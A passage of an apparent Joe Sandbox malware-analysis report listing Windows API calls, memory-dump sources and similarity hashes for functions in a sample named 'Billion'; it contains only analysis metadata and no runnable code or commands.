                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f30797d9c8bdb144c33cea2dcc7d7296e3a3d58d3b21a25dd4010c525a6a59d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c53c4c3aa3a2070192dba9529892bd01242931255729c40879d6d8b36ee1202
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f30797d9c8bdb144c33cea2dcc7d7296e3a3d58d3b21a25dd4010c525a6a59d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3B1013560C7029FC314DF28C990A7AB7E6BFA6724F10491DF59687292D730D884CB92
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBBF8
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC10
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC34
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBC60
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC74
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC96
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBD92
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A0F4E: GetStdHandle.KERNEL32(000000F6), ref: 001A0F6D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBDAB
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBDC6
                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001BBE16
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 001BBE67
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001BBE99
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BBEAA
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BBEBC
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BBECE
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001BBF43
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7d3e713fd3f01d4cdd0abf2c92fd1be3f6da8a3e055a3806612bf96cbd6dd1e0
                                                                                                                                                                                                                                                                                                          • Instruction ID: ce8127f0ddd17fcf9d63125fd1667a42712a64f209cf233042e1b618ac01aeaa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d3e713fd3f01d4cdd0abf2c92fd1be3f6da8a3e055a3806612bf96cbd6dd1e0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F1BF71608340DFCB15EF24C891BAABBE1BF95314F14855DF8998B2A2CB70EC45CB52
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,001CDCD0), ref: 001B4B18
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001B4B2A
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,001CDCD0), ref: 001B4B4F
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,001CDCD0), ref: 001B4B9B
                                                                                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,001CDCD0), ref: 001B4C05
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 001B4CBF
                                                                                                                                                                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001B4D25
                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 001B4D4F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                          • Opcode ID: a11727c9d1b473b64aeefb4bd047540a1d9f0cd4d8004b29cdffdc3b2c08eb6b
                                                                                                                                                                                                                                                                                                          • Instruction ID: f63a21318a7040ad8787fa097b7ebd99addf9be40b5b2f7f22801affbf7fbf4d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a11727c9d1b473b64aeefb4bd047540a1d9f0cd4d8004b29cdffdc3b2c08eb6b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8512FA75A00115EFDB14DF98C884EAABBB5FF49314F25C098F909AB252D731ED46CBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(002029C0), ref: 00173F72
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(002029C0), ref: 00174022
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00174066
                                                                                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0017406F
                                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(002029C0,00000000,?,00000000,00000000,00000000), ref: 00174082
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0017408E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: 91bfbd36651c195fdd2b19c1c8a37897978f8fa155077f60d9c5d40639d33a34
                                                                                                                                                                                                                                                                                                          • Instruction ID: 29a33b0b74052d9b3ba70afd8ea299b235d02489a8075b7623fe95dc81f4135c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91bfbd36651c195fdd2b19c1c8a37897978f8fa155077f60d9c5d40639d33a34
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710530645205BFEB258F28DC49FAABF75FF05364F108216F628A61E0C7B1A950EB95
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 001C7823
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001C7897
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001C78B9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001C78CC
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001C78ED
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00130000,00000000), ref: 001C791C
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001C7935
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001C794E
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001C7955
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001C796D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001C7985
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                          • Opcode ID: c8b6e5d4ac8c51f3ea25cb9bb91303239a03cdc013d8faf7e24cdc856c556eff
                                                                                                                                                                                                                                                                                                          • Instruction ID: af5f93c12ff00644a43ac1aeae728cbbfbe216b8a2b04144727dbf01fe62f84a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8b6e5d4ac8c51f3ea25cb9bb91303239a03cdc013d8faf7e24cdc856c556eff
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06716670108345AFD725DF18DC48F6ABBE9EB99318F14446EF985872A1CBB0E946CF12
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00131488,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 00131865
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00131521
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,0013145A,00000000,?), ref: 001315BB
                                                                                                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 001729B4
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 001729E2
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0013145A,00000000,?), ref: 001729F9
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013145A,00000000), ref: 00172A15
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00172A27
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                          • String ID: <)
                                                                                                                                                                                                                                                                                                          • API String ID: 641708696-2904062661
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c1253402a706f67b40c10aebdc95a257f1596e0dd69723ad0dc6ac2d280fb51
                                                                                                                                                                                                                                                                                                          • Instruction ID: 628849d2ee5d586e36e04b3ecc30b69586bee51ceed2c99803fdc2c7cf1aabb3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c1253402a706f67b40c10aebdc95a257f1596e0dd69723ad0dc6ac2d280fb51
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A617931501715EFDB399F18E94DB2ABBB1FB85326F20812AE04797A61C770E895CB84
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001ACEF5
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001ACF08
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001ACF1C
                                                                                                                                                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001ACF35
                                                                                                                                                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001ACF78
                                                                                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001ACF8E
                                                                                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001ACF99
                                                                                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001ACFC9
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001AD021
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001AD035
                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 001AD040
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                          • Opcode ID: c28746ac1f75e933072b06731e202423cfa47ceb31eb25eb92e1ccb396f925ee
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9a5c14fd1b28be8547a14a5dc869563ff61ba9ba0d57382fa57552e2c8b8d776
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28746ac1f75e933072b06731e202423cfa47ceb31eb25eb92e1ccb396f925ee
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D517FB5500B04BFDB219FA0ED88EAB7BBCFF1A744F004429F94696650D734D9459BA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001C66D6,?,?), ref: 001C8FEE
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C8FFE
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9009
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9016
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001C9024
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9033
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001C903C
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9043
                                                                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001C66D6,?,?,00000000,?), ref: 001C9054
                                                                                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001D0C04,?), ref: 001C906D
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 001C907D
                                                                                                                                                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 001C909D
                                                                                                                                                                                                                                                                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 001C90CD
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001C90F5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001C910B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0595bff7d5740fac079aa37d5498cffbb1b7ab03108d6387f40c39b16ce8f61f
                                                                                                                                                                                                                                                                                                          • Instruction ID: f655811026a2dbdde57eaa046f76678c2095d98c3b16792739b36a703c12b384
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0595bff7d5740fac079aa37d5498cffbb1b7ab03108d6387f40c39b16ce8f61f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141F775600208AFDB119FA5EC8CEAABBBDFF89711F144069F905E7660D770D981DB20
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC154
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001BC1D2
                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 001BC26A
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 001BC2DE
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 001BC2FC
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 001BC352
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001BC364
                                                                                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001BC382
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 001BC3E3
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001BC3F4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                          • Opcode ID: f1acc0431f40e63f796f1e909706c12f19f82b19eab639713b28b792f6861036
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0cad6fdc8e9552fa4b20af4404bdc44df4743580adcde116490151aa1e6ef671
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1acc0431f40e63f796f1e909706c12f19f82b19eab639713b28b792f6861036
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49C19D74208201AFD714DF68C495F6ABBE1BF94308F54849CF4968B2A2CB71ED46CBD1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 001CA990
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 001CA9A7
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001CA9B3
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 001CA9C9
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 001CAC15
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001CAC33
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001CAC54
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 001CAC73
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 001CAC95
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000005,?), ref: 001CACBB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
